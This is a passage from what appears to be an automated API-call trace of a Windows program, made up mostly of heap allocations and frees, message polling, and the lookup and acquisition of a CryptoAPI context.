dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.393] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0234.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.393] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0234.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.395] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0234.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0234.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0234.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0234.399] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a28 [0234.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0234.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0234.400] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0234.400] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.403] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", 